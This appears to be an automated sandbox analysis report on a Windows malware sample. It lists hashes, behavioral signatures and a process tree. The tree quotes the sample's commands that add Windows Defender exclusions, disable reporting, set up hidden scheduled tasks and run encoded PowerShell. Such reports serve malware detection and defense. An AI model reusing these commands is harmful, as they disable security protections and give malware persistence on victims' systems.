Analysis
-
max time kernel
95s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20221111-en -
resource tags
arch:x64arch:x86image:win10v2004-20221111-enlocale:en-usos:windows10-2004-x64system -
submitted
23-12-2022 09:08
Static task
static1
Behavioral task
behavioral1
Sample
file.exe
Resource
win7-20220812-en
General
-
Target
file.exe
-
Size
7.2MB
-
MD5
ff55f4067e93ffb346a752baf7b5ced3
-
SHA1
1656902f49e626a01d9f7f41de1d983ccc21b376
-
SHA256
0db6a5a7e7be62c8fd8b206bd889285aebafe58692bb718768449b06ae7ae1bc
-
SHA512
a4bd8090df176f0cc428e5c9198cbaa32c8775be26fd1cd45c181cbef9e58811b218dc21da7d9350fbae7ac2bdfdc75bd5dc30bc3d8b7d9433e4d30fc775517a
-
SSDEEP
196608:91OI/5t5b5FeRP6Z28u8NEFTyPpxonTewNPljKt3qEKR7xf7:3OE9s8NiTUpCnDVKt3qEe7xD
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 111 4992 rundll32.exe -
Executes dropped EXE 4 IoCs
pid Process 2692 Install.exe 3884 Install.exe 3360 VOqDozH.exe 4672 IPWdkTc.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation IPWdkTc.exe Key value queried \REGISTRY\USER\S-1-5-21-2386679933-1492765628-3466841596-1000\Control Panel\International\Geo\Nation Install.exe -
Loads dropped DLL 1 IoCs
pid Process 4992 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 1 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json IPWdkTc.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini IPWdkTc.exe -
Drops file in System32 directory 29 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D IPWdkTc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B8C7C973B30115D9F846695C38BBC1F IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3B8C7C973B30115D9F846695C38BBC1F IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA IPWdkTc.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IPWdkTc.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol VOqDozH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 IPWdkTc.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini VOqDozH.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA IPWdkTc.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_259154B02A93A7C95A00126214FBE388 IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2 IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_392D09B4041D6970192F5EF741FAA9F2 IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 IPWdkTc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_ACA51E1ABBF1573BBD9B48CF6AC4217D IPWdkTc.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi IPWdkTc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi IPWdkTc.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IPWdkTc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak IPWdkTc.exe File created C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\pJwbNMt.xml IPWdkTc.exe File created C:\Program Files (x86)\VpeeuBoLdsfCC\sVNKQSC.dll IPWdkTc.exe File created C:\Program Files (x86)\mgLqjNPWU\ducyvKD.xml IPWdkTc.exe File created C:\Program Files (x86)\kFdzwgcsqDZevnSgonR\lqXfkFf.dll IPWdkTc.exe File created C:\Program Files (x86)\mgLqjNPWU\xlUxoh.dll IPWdkTc.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja IPWdkTc.exe File created C:\Program Files (x86)\mMQoIZnNGNdU2\axNlhUnxvouhO.dll IPWdkTc.exe File created C:\Program Files (x86)\mMQoIZnNGNdU2\dUhjECQ.xml IPWdkTc.exe File created C:\Program Files (x86)\VpeeuBoLdsfCC\dJNhyRi.xml IPWdkTc.exe File created C:\Program Files (x86)\VMeMEPztOsUn\MbMUSbj.dll IPWdkTc.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bVPnZmTmfBquXJeKIT.job schtasks.exe File created C:\Windows\Tasks\CeimXGcICqHikUZiG.job schtasks.exe File created C:\Windows\Tasks\UQjVtDzLrufMISZ.job schtasks.exe File created C:\Windows\Tasks\rTRcbUUPNNGcKFAGn.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2964 schtasks.exe 1640 schtasks.exe 3892 schtasks.exe 3292 schtasks.exe 2968 schtasks.exe 4204 schtasks.exe 5044 schtasks.exe 4800 schtasks.exe 3820 schtasks.exe 1072 schtasks.exe 2640 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing IPWdkTc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" IPWdkTc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000} IPWdkTc.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ IPWdkTc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\TelemetrySalt = "1" IPWdkTc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket IPWdkTc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume IPWdkTc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}\NukeOnDelete = "0" IPWdkTc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" IPWdkTc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{d2609e0b-0000-0000-0000-d01200000000}\MaxCapacity = "15140" IPWdkTc.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" IPWdkTc.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe -
Suspicious behavior: EnumeratesProcesses 47 IoCs
pid Process 1880 powershell.EXE 1880 powershell.EXE 3912 powershell.exe 3912 powershell.exe 3912 powershell.exe 1440 powershell.exe 1440 powershell.exe 1440 powershell.exe 1136 powershell.EXE 1136 powershell.EXE 1136 powershell.EXE 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe 4672 IPWdkTc.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 1880 powershell.EXE Token: SeDebugPrivilege 3912 powershell.exe Token: SeDebugPrivilege 1440 powershell.exe Token: SeDebugPrivilege 1136 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2780 wrote to memory of 2692 2780 file.exe 80 PID 2780 wrote to memory of 2692 2780 file.exe 80 PID 2780 wrote to memory of 2692 2780 file.exe 80 PID 2692 wrote to memory of 3884 2692 Install.exe 81 PID 2692 wrote to memory of 3884 2692 Install.exe 81 PID 2692 wrote to memory of 3884 2692 Install.exe 81 PID 3884 wrote to memory of 4076 3884 Install.exe 82 PID 3884 wrote to memory of 4076 3884 Install.exe 82 PID 3884 wrote to memory of 4076 3884 Install.exe 82 PID 3884 wrote to memory of 4636 3884 Install.exe 84 PID 3884 wrote to memory of 4636 3884 Install.exe 84 PID 3884 wrote to memory of 4636 3884 Install.exe 84 PID 4076 wrote to memory of 4320 4076 forfiles.exe 87 PID 4076 wrote to memory of 4320 4076 forfiles.exe 87 PID 4076 wrote to memory of 4320 4076 forfiles.exe 87 PID 4320 wrote to memory of 1172 4320 cmd.exe 89 PID 4320 wrote to memory of 1172 4320 cmd.exe 89 PID 4320 wrote to memory of 1172 4320 cmd.exe 89 PID 4636 wrote to memory of 4628 4636 forfiles.exe 90 PID 4636 wrote to memory of 4628 4636 forfiles.exe 90 PID 4636 wrote to memory of 4628 4636 forfiles.exe 90 PID 4320 wrote to memory of 3080 4320 cmd.exe 91 PID 4320 wrote to memory of 3080 4320 cmd.exe 91 PID 4320 wrote to memory of 3080 4320 cmd.exe 91 PID 4628 wrote to memory of 116 4628 cmd.exe 92 PID 4628 wrote to memory of 116 4628 cmd.exe 92 PID 4628 wrote to memory of 116 4628 cmd.exe 92 PID 4628 wrote to memory of 2348 4628 cmd.exe 93 PID 4628 wrote to memory of 2348 4628 cmd.exe 93 PID 4628 wrote to memory of 2348 4628 cmd.exe 93 PID 3884 wrote to memory of 2968 3884 Install.exe 96 PID 3884 wrote to memory of 2968 3884 Install.exe 96 PID 3884 wrote to memory of 2968 3884 Install.exe 96 PID 3884 wrote to memory of 2564 3884 Install.exe 98 PID 3884 wrote to memory of 2564 3884 Install.exe 98 PID 3884 wrote to memory of 2564 3884 Install.exe 98 PID 1880 wrote to memory of 2512 1880 powershell.EXE 103 PID 1880 wrote to memory of 2512 1880 powershell.EXE 103 PID 3884 wrote to memory of 2564 3884 Install.exe 112 PID 3884 wrote to memory of 2564 3884 Install.exe 112 PID 3884 wrote to memory of 2564 3884 Install.exe 112 PID 3884 wrote to memory of 2964 3884 Install.exe 114 PID 3884 wrote to memory of 2964 3884 Install.exe 114 PID 3884 wrote to memory of 2964 3884 Install.exe 114 PID 3360 wrote to memory of 3912 3360 VOqDozH.exe 120 PID 3360 wrote to memory of 3912 3360 VOqDozH.exe 120 PID 3360 wrote to memory of 3912 3360 VOqDozH.exe 120 PID 3912 wrote to memory of 4596 3912 powershell.exe 124 PID 3912 wrote to memory of 4596 3912 powershell.exe 124 PID 3912 wrote to memory of 4596 3912 powershell.exe 124 PID 4596 wrote to memory of 1712 4596 cmd.exe 125 PID 4596 wrote to memory of 1712 4596 cmd.exe 125 PID 4596 wrote to memory of 1712 4596 cmd.exe 125 PID 3912 wrote to memory of 3996 3912 powershell.exe 126 PID 3912 wrote to memory of 3996 3912 powershell.exe 126 PID 3912 wrote to memory of 3996 3912 powershell.exe 126 PID 3912 wrote to memory of 1360 3912 powershell.exe 127 PID 3912 wrote to memory of 1360 3912 powershell.exe 127 PID 3912 wrote to memory of 1360 3912 powershell.exe 127 PID 3912 wrote to memory of 2180 3912 powershell.exe 128 PID 3912 wrote to memory of 2180 3912 powershell.exe 128 PID 3912 wrote to memory of 2180 3912 powershell.exe 128 PID 3912 wrote to memory of 1444 3912 powershell.exe 129 PID 3912 wrote to memory of 1444 3912 powershell.exe 129
Processes
-
C:\Users\Admin\AppData\Local\Temp\file.exe"C:\Users\Admin\AppData\Local\Temp\file.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2780 -
C:\Users\Admin\AppData\Local\Temp\7zS799A.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2692 -
C:\Users\Admin\AppData\Local\Temp\7zS7CB6.tmp\Install.exe.\Install.exe /S /site_id "525403"3⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3884 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4076 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4320 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:1172
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:3080
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4636 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4628 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:116
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:2348
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzxnkpWHu" /SC once /ST 01:39:50 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2968
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzxnkpWHu"4⤵PID:2564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzxnkpWHu"4⤵PID:2564
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bVPnZmTmfBquXJeKIT" /SC once /ST 10:09:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\VOqDozH.exe\" vN /site_id 525403 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:2964
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1880 -
C:\Windows\system32\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force2⤵PID:2512
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵PID:4848
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵PID:3580
-
C:\Windows\system32\gpscript.exegpscript.exe /RefreshSystemParam1⤵PID:4280
-
C:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\VOqDozH.exeC:\Users\Admin\AppData\Local\Temp\wAAoYppMDbtShAwYq\GfPyGdpxFACRQsJ\VOqDozH.exe vN /site_id 525403 /S1⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of WriteProcessMemory
PID:3360 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 